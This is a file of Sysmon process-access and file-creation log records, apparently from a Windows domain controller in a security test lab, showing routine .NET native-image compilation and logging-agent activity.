{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8678,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:43.420\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:43.420","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8679,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:43.451\r\nProcessGuid: {E2A3D6B1-1393-5F25-0000-0010D7201000}\r\nProcessId: 4448\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1160-0\\System.Web.DynamicData.Design.dll\r\nCreationUtcTime: 2020-08-01 07:02:43.451","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:43.451","ProcessGuid":"{E2A3D6B1-1393-5F25-0000-0010D7201000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1160-0\\System.Web.DynamicData.Design.dll","CreationUtcTime":"2020-08-01 07:02:43.451","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8680,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:43.482\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1393-5F25-0000-001080251000}\r\nTargetProcessId: 4712\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:43.482","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1393-5F25-0000-001080251000}","TargetProcessId":"4712","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8681,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:43.482\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1393-5F25-0000-001080251000}\r\nTargetProcessId: 4712\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:43.482","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1393-5F25-0000-001080251000}","TargetProcessId":"4712","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8682,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:43.498\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1393-5F25-0000-001080251000}\r\nTargetProcessId: 4712\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:43.498","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1393-5F25-0000-001080251000}","TargetProcessId":"4712","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8683,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:43.545\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1393-5F25-0000-00108E291000}\r\nTargetProcessId: 484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:43.545","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1393-5F25-0000-00108E291000}","TargetProcessId":"484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8684,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:43.545\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1393-5F25-0000-00108E291000}\r\nTargetProcessId: 484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:43.545","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1393-5F25-0000-00108E291000}","TargetProcessId":"484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8685,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:43.545\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1393-5F25-0000-00108E291000}\r\nTargetProcessId: 484\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:43.545","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1393-5F25-0000-00108E291000}","TargetProcessId":"484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8686,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:43.795\r\nProcessGuid: {E2A3D6B1-1393-5F25-0000-00108E291000}\r\nProcessId: 484\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1e4-0\\System.Web.Entity.dll\r\nCreationUtcTime: 2020-08-01 07:02:43.795","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:43.795","ProcessGuid":"{E2A3D6B1-1393-5F25-0000-00108E291000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1e4-0\\System.Web.Entity.dll","CreationUtcTime":"2020-08-01 07:02:43.795","EventReceivedTime":"2020-08-01 07:02:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
